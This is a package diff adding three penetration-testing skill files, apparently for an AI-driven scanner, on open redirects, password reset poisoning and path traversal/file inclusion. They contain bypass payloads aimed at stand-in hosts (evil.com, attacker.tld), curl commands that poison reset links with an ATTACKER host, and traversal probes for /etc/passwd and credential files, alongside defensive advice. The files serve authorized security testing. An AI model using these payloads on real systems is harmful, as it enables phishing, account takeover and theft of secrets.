@aegis-scan/skills 0.5.0 → 0.5.1

package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md

@@ -0,0 +1,167 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: open-redirect
+description: Open redirect testing for phishing pivots, OAuth token theft, and allowlist bypass
+---
+
+# Open Redirect
+
+Open redirects enable phishing, OAuth/OIDC code and token theft, and allowlist bypass in server-side fetchers that follow redirects. Treat every redirect target as untrusted: canonicalize and enforce exact allowlists per scheme, host, and path.
+
+## Attack Surface
+
+**Server-Driven Redirects**
+- HTTP 3xx Location
+
+**Client-Driven Redirects**
+- `window.location`, meta refresh, SPA routers
+
+**OAuth/OIDC/SAML Flows**
+- `redirect_uri`, `post_logout_redirect_uri`, `RelayState`, `returnTo`/`continue`/`next`
+
+**Multi-Hop Chains**
+- Only first hop validated
+
+## High-Value Targets
+
+- Login/logout, password reset, SSO/OAuth flows
+- Payment gateways, email links, invite/verification
+- Unsubscribe, language/locale switches
+- `/out` or `/r` redirectors
+
+## Reconnaissance
+
+### Injection Points
+
+- Params: `redirect`, `url`, `next`, `return_to`, `returnUrl`, `continue`, `goto`, `target`, `callback`, `out`, `dest`, `back`, `to`, `r`, `u`
+- OAuth/OIDC/SAML: `redirect_uri`, `post_logout_redirect_uri`, `RelayState`, `state`
+- SPA: `router.push`/`replace`, `location.assign`/`href`, meta refresh, `window.open`
+- Headers: `Host`, `X-Forwarded-Host`/`Proto`, `Referer`; server-side Location echo
+
+### Parser Differentials
+
+**Userinfo**
+- `https://trusted.com@evil.com` → validators parse host as trusted.com, browser navigates to evil.com
+- Variants: `trusted.com%40evil.com`, `a%40evil.com%40trusted.com`
+
+**Backslash and Slashes**
+- `https://trusted.com\evil.com`, `https://trusted.com\@evil.com`, `///evil.com`, `/\evil.com`
+
+**Whitespace and Control**
+- `http%09://evil.com`, `http%0A://evil.com`, `trusted.com%09evil.com`
+
+**Fragment and Query**
+- `trusted.com#@evil.com`, `trusted.com?//@evil.com`, `?next=//evil.com#@trusted.com`
+
+**Unicode and IDNA**
+- Punycode/IDN: `truѕted.com` (Cyrillic), `trusted.com。evil.com` (full-width dot), trailing dot
+
+### Encoding Bypasses
+
+- Double encoding: `%2f%2fevil.com`, `%252f%252fevil.com`
+- Mixed case and scheme smuggling: `hTtPs://evil.com`, `http:evil.com`
+- IP variants: decimal 2130706433, octal 0177.0.0.1, hex 0x7f.1, IPv6 `[::ffff:127.0.0.1]`
+- User-controlled path bases: `/out?url=/\evil.com`
+
+## Key Vulnerabilities
+
+### Allowlist Evasion
+
+**Common Mistakes**
+- Substring/regex contains checks: allows `trusted.com.evil.com`
+- Wildcards: `*.trusted.com` also matches `attacker.trusted.com.evil.net`
+- Missing scheme pinning: `data:`, `javascript:`, `file:`, `gopher:` accepted
+- Case/IDN drift between validator and browser
+
+**Robust Validation**
+- Canonicalize with a single modern URL parser (WHATWG URL)
+- Compare exact scheme, hostname (post-IDNA), and an explicit allowlist with optional exact path prefixes
+- Require absolute HTTPS; reject protocol-relative `//` and unknown schemes
+
+### OAuth/OIDC/SAML
+
+**Redirect URI Abuse**
+- Using an open redirect on a trusted domain for redirect_uri enables code interception
+- Weak prefix/suffix checks: `https://trusted.com` → `https://trusted.com.evil.com`
+- Path traversal/canonicalization: `/oauth/../../@evil.com`
+- `post_logout_redirect_uri` often less strictly validated
+
+### Client-Side Vectors
+
+**JavaScript Redirects**
+- `location.href`/`assign`/`replace` using user input
+- Meta refresh `content=0;url=USER_INPUT`
+- SPA routers: `router.push(searchParams.get('next'))`
+
+### Reverse Proxies and Gateways
+
+- Host/X-Forwarded-* may change absolute URL construction
+- CDNs that follow redirects for link checking can leak tokens when chained
+
+### SSRF Chaining
+
+- Server-side fetchers (web previewers, link unfurlers) follow 3xx
+- Combine with an open redirect on an allowlisted domain to pivot to internal targets (169.254.169.254, localhost)
+
+## Exploitation Scenarios
+
+### OAuth Code Interception
+
+1. Set redirect_uri to `https://trusted.example/out?url=https://attacker.tld/cb`
+2. IdP sends code to trusted.example which redirects to attacker.tld
+3. Exchange code for tokens; demonstrate account access
+
+### Phishing Flow
+
+1. Send link on trusted domain: `/login?next=https://attacker.tld/fake`
+2. Victim authenticates; browser navigates to attacker page
+3. Capture credentials/tokens via cloned UI
+
+### Internal Evasion
+
+1. Server-side link unfurler fetches `https://trusted.example/out?u=http://169.254.169.254/latest/meta-data`
+2. Redirect follows to metadata; confirm via timing/headers
+
+## Testing Methodology
+
+1. **Inventory surfaces** - Login/logout, password reset, SSO/OAuth flows, payment gateways, email links
+2. **Build test matrix** - Scheme × host × path variants and encoding/unicode forms
+3. **Compare behaviors** - Server-side validation vs browser navigation results
+4. **Multi-hop testing** - Trusted-domain → redirector → external
+5. **Prove impact** - Credential phishing, OAuth code interception, internal egress
+
+## Validation
+
+1. Produce a minimal URL that navigates to an external domain via the vulnerable surface; include the full address bar capture
+2. Show bypass of the stated validation (regex/allowlist) using canonicalization variants
+3. Test multi-hop: prove only first hop is validated and second hop escapes constraints
+4. For OAuth/SAML, demonstrate code/RelayState delivery to an attacker-controlled endpoint
+
+## False Positives
+
+- Redirects constrained to relative same-origin paths with robust normalization
+- Exact pre-registered OAuth redirect_uri with strict verifier
+- Validators using a single canonical parser and comparing post-IDNA host and scheme
+- User prompts that show the exact final destination before navigating
+
+## Impact
+
+- Credential and token theft via phishing and OAuth/OIDC interception
+- Internal data exposure when server fetchers follow redirects
+- Policy bypass where allowlists are enforced only on the first hop
+- Cross-application trust erosion and brand abuse
+
+## Pro Tips
+
+1. Always compare server-side canonicalization to real browser navigation; differences reveal bypasses
+2. Try userinfo, protocol-relative, Unicode/IDN, and IP numeric variants early
+3. In OAuth, prioritize `post_logout_redirect_uri` and less-discussed flows; they're often looser
+4. Exercise multi-hop across distinct subdomains and paths
+5. For SSRF chaining, target services known to follow redirects
+6. Favor allowlists of exact origins plus optional path prefixes
+7. Keep a curated suite of redirect payloads per runtime (Java, Node, Python, Go)
+
+## Summary
+
+Redirection is safe only when the final destination is constrained after canonicalization. Enforce exact origins, verify per hop, and treat client-provided destinations as untrusted across every stack.

package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md

@@ -0,0 +1,66 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+# Password Reset Poisoning
+
+## Overview
+Password reset poisoning manipulates reset links (Host header, X-Forwarded-Host,
+or redirect parameters) to deliver attacker-controlled URLs to victims.
+
+## Phase 1: Identify Reset Flow
+```bash
+# Common endpoints: /reset, /forgot, /password/reset
+# Capture the reset email/link format
+```
+
+## Phase 2: Host Header Injection
+```bash
+TARGET_URL="https://TARGET/forgot"
+
+curl -s -X POST "$TARGET_URL" \
+  -H "Host: ATTACKER" \
+  -H "X-Forwarded-Host: ATTACKER" \
+  -H "Content-Type: application/x-www-form-urlencoded" \
+  --data "email=victim@example.com" \
+  | tee /workspace/output/TARGET_reset_host_poison.txt
+```
+
+## Phase 3: Redirect Parameter Injection
+```bash
+# If reset flow supports redirect/callback parameters
+curl -s -X POST "$TARGET_URL?redirect=https://ATTACKER" \
+  -H "Content-Type: application/x-www-form-urlencoded" \
+  --data "email=victim@example.com" \
+  | tee /workspace/output/TARGET_reset_redirect_poison.txt
+```
+
+## Phase 4: Validation
+```bash
+# Verify whether the reset email contains the injected host/redirect
+# Confirm with a controlled test account
+```
+
+## Report Template
+
+```
+Target: TARGET
+Assessment Date: <DATE>
+
+## Confirmed Findings
+- [ ] Reset link uses untrusted Host header
+- [ ] Redirect parameter poisons reset link
+
+## Evidence
+- Host poisoning request: /workspace/output/TARGET_reset_host_poison.txt
+- Redirect poisoning request: /workspace/output/TARGET_reset_redirect_poison.txt
+
+## Recommendations
+1. Use a fixed, server-side base URL for reset links
+2. Reject untrusted Host/X-Forwarded-Host headers
+3. Validate and allowlist redirect targets
+```
+
+## Output Files
+- `/workspace/output/TARGET_reset_host_poison.txt` — host poisoning request
+- `/workspace/output/TARGET_reset_redirect_poison.txt` — redirect poisoning request
+
+indicators: password reset poisoning, host header injection, reset link poisoning, reset redirect

package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md

@@ -0,0 +1,192 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: path-traversal-lfi-rfi
+description: Path traversal and file inclusion testing for local/remote file access and code execution
+---
+
+# Path Traversal / LFI / RFI
+
+Improper file path handling and dynamic inclusion enable sensitive file disclosure, config/source leakage, SSRF pivots, and code execution. Treat all user-influenced paths, names, and schemes as untrusted; normalize and bind them to an allowlist or eliminate user control entirely.
+
+## Attack Surface
+
+**Path Traversal**
+- Read files outside intended roots via `../`, encoding, normalization gaps
+
+**Local File Inclusion (LFI)**
+- Include server-side files into interpreters/templates
+
+**Remote File Inclusion (RFI)**
+- Include remote resources (HTTP/FTP/wrappers) for code execution
+
+**Archive Extraction**
+- Zip Slip: write outside target directory upon unzip/untar
+
+**Normalization Mismatches**
+- Server/proxy differences (nginx alias/root, upstream decoders)
+- OS-specific paths: Windows separators, device names, UNC, NT paths, alternate data streams
+
+## High-Value Targets
+
+**Unix**
+- `/etc/passwd`, `/etc/hosts`, application `.env`/`config.yaml`
+- SSH keys, cloud creds, service configs/logs
+
+**Windows**
+- `C:\Windows\win.ini`, IIS/web.config, programdata configs, application logs
+
+**Application**
+- Source code templates and server-side includes
+- Secrets in env dumps, framework caches
+
+## Reconnaissance
+
+### Surface Map
+
+- HTTP params: `file`, `path`, `template`, `include`, `page`, `view`, `download`, `export`, `report`, `log`, `dir`, `theme`, `lang`
+- Upload and conversion pipelines: image/PDF renderers, thumbnailers, office converters
+- Archive extract endpoints and background jobs; imports with ZIP/TAR/GZ/7z
+- Server-side template rendering (PHP/Smarty/Twig/Blade), email templates, CMS themes/plugins
+- Reverse proxies and static file servers (nginx, CDN) in front of app handlers
+
+### Capability Probes
+
+- Path traversal baseline: `../../etc/hosts` and `C:\Windows\win.ini`
+- Encodings: `%2e%2e%2f`, `%252e%252e%252f`, `..%2f`, `..%5c`, mixed UTF-8 (`%c0%2e`), Unicode dots and slashes
+- Normalization tests: `..../`, `..\\`, `././`, trailing dot/double dot segments; repeated decoding
+- Absolute path acceptance: `/etc/passwd`, `C:\Windows\System32\drivers\etc\hosts`
+- Server mismatch: `/static/..;/../etc/passwd` ("..;"), encoded slashes (`%2F`), double-decoding via upstream
+
+## Detection Channels
+
+### Direct
+
+- Response body discloses file content (text, binary, base64)
+- Error pages echo real paths
+
+### Error-Based
+
+- Exception messages expose canonicalized paths or `include()` warnings with real filesystem locations
+
+### OAST
+
+- RFI/LFI with wrappers that trigger outbound fetches (HTTP/DNS) to confirm inclusion/execution
+
+### Side Effects
+
+- Archive extraction writes files unexpectedly outside target
+- Verify with directory listings or follow-up reads
+
+## Key Vulnerabilities
+
+### Path Traversal Bypasses
+
+**Encodings**
+- Single/double URL-encoding, mixed case, overlong UTF-8, UTF-16, path normalization oddities
+
+**Mixed Separators**
+- `/` and `\\` on Windows; `//` and `\\\\` collapse differences across frameworks
+
+**Dot Tricks**
+- `....//` (double dot folding), trailing dots (Windows), trailing slashes, appended valid extension
+
+**Absolute Path Injection**
+- Bypass joins by supplying a rooted path
+
+**Alias/Root Mismatch**
+- nginx alias without trailing slash with nested location allows `../` to escape
+- Try `/static/../etc/passwd` and ";" variants (`..;`)
+
+**Upstream vs Backend Decoding**
+- Proxies/CDNs decoding `%2f` differently; test double-decoding and encoded dots
+
+### LFI Wrappers and Techniques
+
+**PHP Wrappers**
+- `php://filter/convert.base64-encode/resource=index.php` (read source)
+- `zip://archive.zip#file.txt`
+- `data://text/plain;base64`
+- `expect://` (if enabled)
+
+**Log/Session Poisoning**
+- Inject PHP/templating payloads into access/error logs or session files then include them
+
+**Upload Temp Names**
+- Include temporary upload files before relocation; race with scanners
+
+**Proc and Caches**
+- `/proc/self/environ` and framework-specific caches for readable secrets
+
+**Legacy Tricks**
+- Null-byte (`%00`) truncation in older stacks; path length truncation
+
+### Template Engines
+
+- PHP include/require; Smarty/Twig/Blade with dynamic template names
+- Java/JSP/FreeMarker/Velocity; Node.js ejs/handlebars/pug engines
+- Seek dynamic template resolution from user input (theme/lang/template)
+
+### RFI Conditions
+
+**Requirements**
+- Remote includes (`allow_url_include`/`allow_url_fopen` in PHP)
+- Custom fetchers that eval/execute retrieved content
+- SSRF-to-exec bridges
+
+**Protocol Handlers**
+- http, https, ftp; language-specific stream handlers
+
+**Exploitation**
+- Host a minimal payload that proves code execution
+- Prefer OAST beacons or deterministic output over heavy shells
+- Chain with upload or log poisoning when remote includes are disabled
+
+### Archive Extraction (Zip Slip)
+
+- Files within archives containing `../` or absolute paths escape target extract directory
+- Test multiple formats: zip/tar/tgz/7z
+- Verify symlink handling and path canonicalization prior to write
+- Impact: overwrite config/templates or drop webshells into served directories
+
+## Testing Methodology
+
+1. **Inventory file operations** - Downloads, previews, templates, logs, exports/imports, report engines, uploads, archive extractors
+2. **Identify input joins** - Path joins (base + user), include/require/template loads, resource fetchers, archive extract destinations
+3. **Probe normalization** - Separators, encodings, double-decodes, case, trailing dots/slashes
+4. **Compare behaviors** - Web server vs application behavior
+5. **Escalate** - From disclosure (read) to influence (write/extract/include), then to execution (wrapper/engine chains)
+
+## Validation
+
+1. Show a minimal traversal read proving out-of-root access (e.g., `/etc/hosts`) with a same-endpoint in-root control
+2. For LFI, demonstrate inclusion of a benign local file or harmless wrapper output (`php://filter` base64 of index.php)
+3. For RFI, prove remote fetch by OAST or controlled output; avoid destructive payloads
+4. For Zip Slip, create an archive with `../` entries and show write outside target (e.g., marker file read back)
+5. Provide before/after file paths, exact requests, and content hashes/lengths for reproducibility
+
+## False Positives
+
+- In-app virtual paths that do not map to filesystem; content comes from safe stores (DB/object storage)
+- Canonicalized paths constrained to an allowlist/root after normalization
+- Wrappers disabled and includes using constant templates only
+- Archive extractors that sanitize paths and enforce destination directories
+
+## Impact
+
+- Sensitive configuration/source disclosure → credential and key compromise
+- Code execution via inclusion of attacker-controlled content or overwritten templates
+- Persistence via dropped files in served directories; lateral movement via revealed secrets
+- Supply-chain impact when report/template engines execute attacker-influenced files
+
+## Pro Tips
+
+1. Compare content-length/ETag when content is masked; read small canonical files (hosts) to avoid noise
+2. Test proxy/CDN and app separately; decoding/normalization order differs, especially for `%2f` and `%2e` encodings
+3. For LFI, prefer `php://filter` base64 probes over destructive payloads; enumerate readable logs and sessions
+4. Validate extraction code with synthetic archives; include symlinks and deep `../` chains
+5. Use minimal PoCs and hard evidence (hashes, paths). Avoid noisy DoS against filesystems
+
+## Summary
+
+Eliminate user-controlled paths where possible. Otherwise, resolve to canonical paths and enforce allowlists, forbid remote schemes, and lock down interpreters and extractors. Normalize consistently at the boundary closest to IO.